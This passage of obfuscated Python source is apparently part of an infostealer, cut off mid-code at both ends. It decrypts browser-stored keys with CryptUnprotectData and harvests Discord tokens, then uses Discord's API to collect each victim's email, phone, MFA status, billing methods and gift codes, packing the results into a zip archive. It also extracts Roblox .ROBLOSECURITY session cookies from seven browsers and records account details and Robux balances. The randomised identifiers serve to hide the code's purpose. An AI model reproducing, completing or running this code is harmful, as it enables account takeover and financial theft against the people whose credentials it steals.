        KUKJDSPRPXAKQIXWDORHEDGGQDPCKQWIYNGARUCOTPXPBHPBAZOZHNDHIX = WBLILGDKVLBWJCQUKZYYMXPHFBWSFKHYVUGBUXTEZIURQHIXHBVQFLNRMBMYERFZHRAOKEQZWJFFGCUEVDNQBSVFLKOM[3:15]
        GLNKFHIMGTNZFUACGXNXYKGLEFZAEYPJVYZBCLPTWCNMDBKMWXIU = WBLILGDKVLBWJCQUKZYYMXPHFBWSFKHYVUGBUXTEZIURQHIXHBVQFLNRMBMYERFZHRAOKEQZWJFFGCUEVDNQBSVFLKOM[15:]
        CPNCAUOBSLDEFXNSMSGQHRDIUEPHISQPPVZWPRGXCISGLJOEGQMUMRRFCPMMTPGERCRXBJBLUZUXGVQHMYAPEPBBJL = AES.new(EHPGQYGKKVNRYHUGMXYLMCVPDUOFNKWGHLQACMAFPBJOXZZNWJXSLCNQTSQGRABPMXP, AES.MODE_GCM, KUKJDSPRPXAKQIXWDORHEDGGQDPCKQWIYNGARUCOTPXPBHPBAZOZHNDHIX)
        return CPNCAUOBSLDEFXNSMSGQHRDIUEPHISQPPVZWPRGXCISGLJOEGQMUMRRFCPMMTPGERCRXBJBLUZUXGVQHMYAPEPBBJL.decrypt(GLNKFHIMGTNZFUACGXNXYKGLEFZAEYPJVYZBCLPTWCNMDBKMWXIU)[:-16].decode()

    def JULSAQPUVEJWAHYMMLSDBSHOQUELVCDHQSKVHTAOJBGMDEEUFFWWFOYRSJXHZQN(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP):
        if not os.path.exists(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP):
            return None
        with open(GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP, "r", encoding="utf-8") as v4r_f:
            KFANHQVCFUXMDHDXCKPKYTVHWQCVFXHNXQGQBJPKOYWRDUJYSHNEEIPXMTYZYWAKKUAT = json.load(v4r_f)
        EHPGQYGKKVNRYHUGMXYLMCVPDUOFNKWGHLQACMAFPBJOXZZNWJXSLCNQTSQGRABPMXP = base64.b64decode(KFANHQVCFUXMDHDXCKPKYTVHWQCVFXHNXQGQBJPKOYWRDUJYSHNEEIPXMTYZYWAKKUAT["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(EHPGQYGKKVNRYHUGMXYLMCVPDUOFNKWGHLQACMAFPBJOXZZNWJXSLCNQTSQGRABPMXP, None, None, None, 0)[1]

    UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV, KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE = NIPXJBIEYTMZZJRXMUTRJMOTNNTJQOWUYYCMKUGODCDVFFVCDGDRKPOPTBVSKNSYSMOLXDOHZJGWLOTCXJRZDTXJPOBVAJOB()
    
    if not UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV:
        BVMMWKUBZNXXAKQMAGRYZHHKSNZDJIJKGAUBXPIPZLYMEGZOMIMVZOIVSDIRCCAUBFLHWEQAOBHY = "No discord tokens found."

    for SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd in UQYXTEVQQWKTKAPSRCNJLNYBOQCLEFSGFYIMGRGOVMYZQCHVEZOIUMVRVBWWKJMLUTIYPOIPIDCFAACXPV:
        KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW += 1

        try: VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd}).json()
        except: VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = {"None": "None"}

        GUXAQVDCJDYVBBMTAKTEXECLZKSVDDFFCKEMVSBAZVUISAWBCAYPERYOOCBIGWRIJJBRBWKYQQSH = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('username', "None") + '#' + VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('discriminator', "None")
        JIDYZAEMPAYVEUKOJNKLYUSUVIWVUSGLNNGRYEIGWTRHVYJYSSMXVVORBLFNCB = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('global_name', "None")
        KOOTEVUPMMGTEPPQQFZIZJTLBLCEWFSPQGOGMRTIVKGQDXEIKFHZABIDALUTELQORMXBU = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('id', "None")
        TBPBZTFXKSFNUFFNGZWWYYCRSHXFEIRQZRMQLFGZWTXCBDEQMIAISKYGJQUVGNRGPDUXAWIEAAUBPKNSOKSZGFWORVQQNDICI = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('email', "None")
        ZUODRBDJZCKOHUDOYHOAVTSICHLAVCUURHQTFHCIPWPADDIZKONGSBXYKQMECSLOCBSOJEEC = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('verified', "None")
        BCGKKFMKKEIERQNWWFHJDBOQRATKFYCJXNGUSHWSSLGPQDJRJJSHYCDNIQJFQWMAMLYTQBSSDYCETRDNNGOT = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('phone', "None")
        ZDKJWBMZWDJODHKBLLYXATNCHQVTBRGIHZDYXHCKUEXQSKRCQIBEYQBHFOWFDHTDEFZRYKFDYHFSSZVIGXRMDEHLNTT = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('locale', "None")
        BVKEFUXTROBHLCCVWYGPHLUCPBCNQPELUCFZDMUWTAPIVQYBYAWWHUJMXEZKBDKJ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('mfa_enabled', "None")

        try:
            if VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('premium_type', 'None') == 0:
                MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = 'False'
            elif VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('premium_type', 'None') == 1:
                MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = 'Nitro Classic'
            elif VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('premium_type', 'None') == 2:
                MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = 'Nitro Boosts'
            elif VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('premium_type', 'None') == 3:
                MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = 'Nitro Basic'
            else:
                MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = 'False'
        except:
            MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS = "None"

        try: MWKCACVWIMIPNYPWDPAIFFRQYIWLVAOXNNHQBEIDWEKHDKXQPQYILOWJN = f"https://cdn.discordapp.com/avatars/{KOOTEVUPMMGTEPPQQFZIZJTLBLCEWFSPQGOGMRTIVKGQDXEIKFHZABIDALUTELQORMXBU}/{VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{KOOTEVUPMMGTEPPQQFZIZJTLBLCEWFSPQGOGMRTIVKGQDXEIKFHZABIDALUTELQORMXBU}/{VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{KOOTEVUPMMGTEPPQQFZIZJTLBLCEWFSPQGOGMRTIVKGQDXEIKFHZABIDALUTELQORMXBU}/{VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP['avatar']}.png"
        except: MWKCACVWIMIPNYPWDPAIFFRQYIWLVAOXNNHQBEIDWEKHDKXQPQYILOWJN = "None"

        try:
            VOXFRJZCEMVHGBBWKFRKFHSULXSMIVFTDOSVGZHIPXJGFYWXXBGRINPARGS = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd}).json()
            if VOXFRJZCEMVHGBBWKFRKFHSULXSMIVFTDOSVGZHIPXJGFYWXXBGRINPARGS:
                METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG = []

                for v4r_method in VOXFRJZCEMVHGBBWKFRKFHSULXSMIVFTDOSVGZHIPXJGFYWXXBGRINPARGS:
                    if v4r_method['type'] == 1:
                        METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG.append('Bank Card')
                    elif v4r_method['type'] == 2:
                        METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG.append("Paypal")
                    else:
                        METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG.append('Other')
                METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG = ' / '.join(METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG)
            else:
                METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG = "None"
        except:
            METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG = "None"

        try:
            CPVIJSPPWRQWUOMUEFCYUHCLPCLTBDWXLOXDBFCIVGGYGJPNXAAGXWLGB = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd}).json()
            if CPVIJSPPWRQWUOMUEFCYUHCLPCLTBDWXLOXDBFCIVGGYGJPNXAAGXWLGB:
                EHIWSWFCRSKFFJCSEEPYHQQERDNEONJHDYBWBYBJBUXLDISRXLNWZIKBDFNAMFOJMAJUXHPRMCEGYSZHSVFEXEMBBBFPNIAKRKJE = []
                for WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB in CPVIJSPPWRQWUOMUEFCYUHCLPCLTBDWXLOXDBFCIVGGYGJPNXAAGXWLGB:
                    RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR = WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB['promotion']['outbound_title']
                    WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB = WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB['code']
                    NHVSZTKXQPKHSJMESDLZTCLQYNXDMOWFKTSJZIIETXLYDQKBWVFXDZDOHPXAURGBDPUKSQCPFLVVQAWDYXMUMVONQOETXUNQCAIE = f"Gift: \"{RDLMJIHSMTQIQDEOWCHOWGDDXTSLPEGQYKLHXZCOEVFQHRZWJFNJOUWLPBVGKGSXIEZMYPR}\" Code: \"{WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB}\""
                    if len('\n\n'.join(WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB)) + len(NHVSZTKXQPKHSJMESDLZTCLQYNXDMOWFKTSJZIIETXLYDQKBWVFXDZDOHPXAURGBDPUKSQCPFLVVQAWDYXMUMVONQOETXUNQCAIE) >= 1024:
                        break
                    EHIWSWFCRSKFFJCSEEPYHQQERDNEONJHDYBWBYBJBUXLDISRXLNWZIKBDFNAMFOJMAJUXHPRMCEGYSZHSVFEXEMBBBFPNIAKRKJE.append(NHVSZTKXQPKHSJMESDLZTCLQYNXDMOWFKTSJZIIETXLYDQKBWVFXDZDOHPXAURGBDPUKSQCPFLVVQAWDYXMUMVONQOETXUNQCAIE)
                if len(EHIWSWFCRSKFFJCSEEPYHQQERDNEONJHDYBWBYBJBUXLDISRXLNWZIKBDFNAMFOJMAJUXHPRMCEGYSZHSVFEXEMBBBFPNIAKRKJE) > 0:
                    WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB = '\n\n'.join(EHIWSWFCRSKFFJCSEEPYHQQERDNEONJHDYBWBYBJBUXLDISRXLNWZIKBDFNAMFOJMAJUXHPRMCEGYSZHSVFEXEMBBBFPNIAKRKJE)
                else:
                    WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB = "None"
            else:
                WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB = "None"
        except:
            WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB = "None"
    
        try: v4r_software_name, GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP = KHMRBRFTFIFWYDEVJXIESUSYNWLDEMMNVEOOSFMBDJOZLTMHQTKNNGMUNERFKBHOEBLYCZQCAMFOVXBVPPKXWKWNZAEORZVTSE.get(SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd, ("Unknown", "Unknown"))
        except: v4r_software_name, GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP = "Unknown", "Unknown"

        BVMMWKUBZNXXAKQMAGRYZHHKSNZDJIJKGAUBXPIPZLYMEGZOMIMVZOIVSDIRCCAUBFLHWEQAOBHY = BVMMWKUBZNXXAKQMAGRYZHHKSNZDJIJKGAUBXPIPZLYMEGZOMIMVZOIVSDIRCCAUBFLHWEQAOBHY + f"""
Discord Account n°{str(KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW)}:
 - Path Found      : {GLWZSWYPVINAFSUBBFJTVFVJVALXJRLRTYXVQQLOFZWABIZZRDSYKNEZYEJMRJUKXEKBLRTKEVFBNOFHYLQUOMCOOP}
 - Software        : {v4r_software_name}
 - Token           : {SOPRLBAHCTLRAXXRYWLLKSXCICVDLHNTVXADRIIBEUWCTNQEGXSYFOOBLBBNGHXXQROQAELLDESKNLESBSQXCMEKNMGNWNGF_d15c0rd}
 - Username        : {GUXAQVDCJDYVBBMTAKTEXECLZKSVDDFFCKEMVSBAZVUISAWBCAYPERYOOCBIGWRIJJBRBWKYQQSH}
 - Display Name    : {JIDYZAEMPAYVEUKOJNKLYUSUVIWVUSGLNNGRYEIGWTRHVYJYSSMXVVORBLFNCB}
 - Id              : {KOOTEVUPMMGTEPPQQFZIZJTLBLCEWFSPQGOGMRTIVKGQDXEIKFHZABIDALUTELQORMXBU}
 - Email           : {TBPBZTFXKSFNUFFNGZWWYYCRSHXFEIRQZRMQLFGZWTXCBDEQMIAISKYGJQUVGNRGPDUXAWIEAAUBPKNSOKSZGFWORVQQNDICI}
 - Email Verified  : {ZUODRBDJZCKOHUDOYHOAVTSICHLAVCUURHQTFHCIPWPADDIZKONGSBXYKQMECSLOCBSOJEEC}
 - Phone           : {BCGKKFMKKEIERQNWWFHJDBOQRATKFYCJXNGUSHWSSLGPQDJRJJSHYCDNIQJFQWMAMLYTQBSSDYCETRDNNGOT}
 - Nitro           : {MQWNLMGRHVMFAAVHRDZABXYNNMGWFSGAMXBLMJOWWNCTOCXITSULLRYHVHMQQJSACAZCPYXNQPMGJIMDFPPZHRARUJS}
 - Language        : {ZDKJWBMZWDJODHKBLLYXATNCHQVTBRGIHZDYXHCKUEXQSKRCQIBEYQBHFOWFDHTDEFZRYKFDYHFSSZVIGXRMDEHLNTT}
 - Billing         : {METRDZOUCBKJCZBHYNAFQKMNCQRNRXNUCOWFJPGFPSMXJUQXXGIKRXUCUCJOKTXSQFNLVDQHAKSPGURGENMEG}
 - Gift Code       : {WGYPXDYSOAENTFPYWPIZDDQONOKVRDWOSCTYMMUDVFOAGVBOGDILFOWNBYEZNRSJWYMKTOJMHTVRTOVOVSCKXGFSMJGXB}
 - Profile Picture : {MWKCACVWIMIPNYPWDPAIFFRQYIWLVAOXNNHQBEIDWEKHDKXQPQYILOWJN}
 - Multi-Factor Authentication : {BVKEFUXTROBHLCCVWYGPHLUCPBCNQPELUCFZDMUWTAPIVQYBYAWWHUJMXEZKBDKJ}
"""
    KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA.writestr(f"Discord Accounts ({KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW}).txt", BVMMWKUBZNXXAKQMAGRYZHHKSNZDJIJKGAUBXPIPZLYMEGZOMIMVZOIVSDIRCCAUBFLHWEQAOBHY)

    return KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW

def AAZJTVXPHCFYDKSXIZGLSWOGSGDUIKYMSPKUHAEKVXJFDUMSYVUAAODESOSCFSRFKBXNZSIYCAHLMRC(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    import browser_cookie3
    import requests
    import json

    JNZOALPCEETSCKMUOINTCDNTHXSUVAHYSTTTRHCACJFYISDBTTAZODIXGLF = ""
    VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR = 0
    XAVOMETUYXDOAQHDXWHHUELKCGTEJWILRIZQTXIECYSMUBOYYRGKMJUFOQVIVPRVUVVTOHEBCBTSTGYKUDFN = []
    

    def NBJTKFNVIFUUVOLQNLHPOSYFDBZLJFDORWZDARCTQXGSCUDTDEBSJPKMLNNPWLTUV(AXKRIVJTKJBAHHUQIHICDEKRETYYVKUOEMNZLFYPQYHTKOQIJXLKCORKU):
        try:
            TIZGCFBOHYSNTWMWHCHHFPSTXHQOXRWWZRPHOLGWVXMUHCTFZHBUFLKZIGKA = AXKRIVJTKJBAHHUQIHICDEKRETYYVKUOEMNZLFYPQYHTKOQIJXLKCORKU()
            TIZGCFBOHYSNTWMWHCHHFPSTXHQOXRWWZRPHOLGWVXMUHCTFZHBUFLKZIGKA = str(TIZGCFBOHYSNTWMWHCHHFPSTXHQOXRWWZRPHOLGWVXMUHCTFZHBUFLKZIGKA)
            ONIVGEESBVRKYHKUEBJWJUMXADIYDAIARZHEGSIKUXITXVVAKXZNLPJCLTAJTEUZICHDCEYERJUVTOCLNUUXVZW = TIZGCFBOHYSNTWMWHCHHFPSTXHQOXRWWZRPHOLGWVXMUHCTFZHBUFLKZIGKA.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            AIJCCBYLMBCZVJXUCVYNKKCCCBZVPQBLFOJMQVENVMBYIBWLIKWZOIUTDNSBZJLCQZDAUY = AXKRIVJTKJBAHHUQIHICDEKRETYYVKUOEMNZLFYPQYHTKOQIJXLKCORKU.__name__
            return ONIVGEESBVRKYHKUEBJWJUMXADIYDAIARZHEGSIKUXITXVVAKXZNLPJCLTAJTEUZICHDCEYERJUVTOCLNUUXVZW, AIJCCBYLMBCZVJXUCVYNKKCCCBZVPQBLFOJMQVENVMBYIBWLIKWZOIUTDNSBZJLCQZDAUY
        except:
            return None, None

    def MicrosoftEdge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def GoogleChrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def OperaGX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    ODRVYRJNFWZOZWTMNXTOVHTKKTWLJJRJJCOZMYTUWZSIZVOGUPZIRWYXGX = [MicrosoftEdge, GoogleChrome, Firefox, Opera, OperaGX, Safari, Brave]
    for v4r_br0ws3r in ODRVYRJNFWZOZWTMNXTOVHTKKTWLJJRJJCOZMYTUWZSIZVOGUPZIRWYXGX:
        v4r_c00ki3, AIJCCBYLMBCZVJXUCVYNKKCCCBZVPQBLFOJMQVENVMBYIBWLIKWZOIUTDNSBZJLCQZDAUY = NBJTKFNVIFUUVOLQNLHPOSYFDBZLJFDORWZDARCTQXGSCUDTDEBSJPKMLNNPWLTUV(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in XAVOMETUYXDOAQHDXWHHUELKCGTEJWILRIZQTXIECYSMUBOYYRGKMJUFOQVIVPRVUVVTOHEBCBTSTGYKUDFN:
                VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR += 1
                XAVOMETUYXDOAQHDXWHHUELKCGTEJWILRIZQTXIECYSMUBOYYRGKMJUFOQVIVPRVUVVTOHEBCBTSTGYKUDFN.append(v4r_c00ki3)
                try:
                    GPNPWSJAXUKTXIUFWAPYDQUZGPYOKUNRREWBVPBMFJTLITRUWMJCDCVTOHTE = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = json.loads(GPNPWSJAXUKTXIUFWAPYDQUZGPYOKUNRREWBVPBMFJTLITRUWMJCDCVTOHTE.text)
                except:
                    VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = {"None": "None"}

                REAZKXXDVSHNWXJTUIXVZKLSARAABBVFRPIJVHBTRNKQVZSIEXCS = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('id', "None")
                NGQBEXHYETBDUYQKGVZSERHJXGXRYIQRZBUFGHWDLEJMHVZQUHOFCHBRKTSSIGKTXMOCKFOMFAOFTNTMLUQ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('displayName', "None")
                PVDYDRKEIYMYZEELAXGADAAZEDXUKAAFSPSDGCTYQQRZGLGYHREBWMKWJFZWAFIG = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('name', "None")
                QISCDIJYLOPGYPOJICWNTLHYYZSNWHSXZEOXPVTFSSVNBNPACILGHOUZTANJKOKQNVYJULWXNUNOMNBBBQJ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get("RobuxBalance", "None")
                MNWBZZQOXIGZSCMRUGPOLWLFEARNZLDKATRRYAULUMQSDUSRFQUTIKRK = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get("IsPremium", "None")
                FLLIPCSJIQUKXUTDTBQDWLICEJGWYHYAJIBWETKZQSNPKKKLGDKPZALPAJXFRQVIIUQVUIRH = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get("ThumbnailUrl", "None")
                NSYSMEUPIJMWVYMINRAMQSTGEXSWSXZIUKYHNBVSKPDNMGWXYSVH = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get("IsAnyBuildersClubMember", "None")
                
                JNZOALPCEETSCKMUOINTCDNTHXSUVAHYSTTTRHCACJFYISDBTTAZODIXGLF = JNZOALPCEETSCKMUOINTCDNTHXSUVAHYSTTTRHCACJFYISDBTTAZODIXGLF + f"""
Roblox Account n°{str(VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR)}:
 - Navigator     : {AIJCCBYLMBCZVJXUCVYNKKCCCBZVPQBLFOJMQVENVMBYIBWLIKWZOIUTDNSBZJLCQZDAUY}
 - Username      : {PVDYDRKEIYMYZEELAXGADAAZEDXUKAAFSPSDGCTYQQRZGLGYHREBWMKWJFZWAFIG}
 - DisplayName   : {NGQBEXHYETBDUYQKGVZSERHJXGXRYIQRZBUFGHWDLEJMHVZQUHOFCHBRKTSSIGKTXMOCKFOMFAOFTNTMLUQ}
 - Id            : {REAZKXXDVSHNWXJTUIXVZKLSARAABBVFRPIJVHBTRNKQVZSIEXCS}
 - Avatar        : {FLLIPCSJIQUKXUTDTBQDWLICEJGWYHYAJIBWETKZQSNPKKKLGDKPZALPAJXFRQVIIUQVUIRH}
 - Robux         : {QISCDIJYLOPGYPOJICWNTLHYYZSNWHSXZEOXPVTFSSVNBNPACILGHOUZTANJKOKQNVYJULWXNUNOMNBBBQJ}
 - Premium       : {MNWBZZQOXIGZSCMRUGPOLWLFEARNZLDKATRRYAULUMQSDUSRFQUTIKRK}
 - Builders Club : {NSYSMEUPIJMWVYMINRAMQSTGEXSWSXZIUKYHNBVSKPDNMGWXYSVH}
 - Cookie        : {v4r_c00ki3}
"""
                
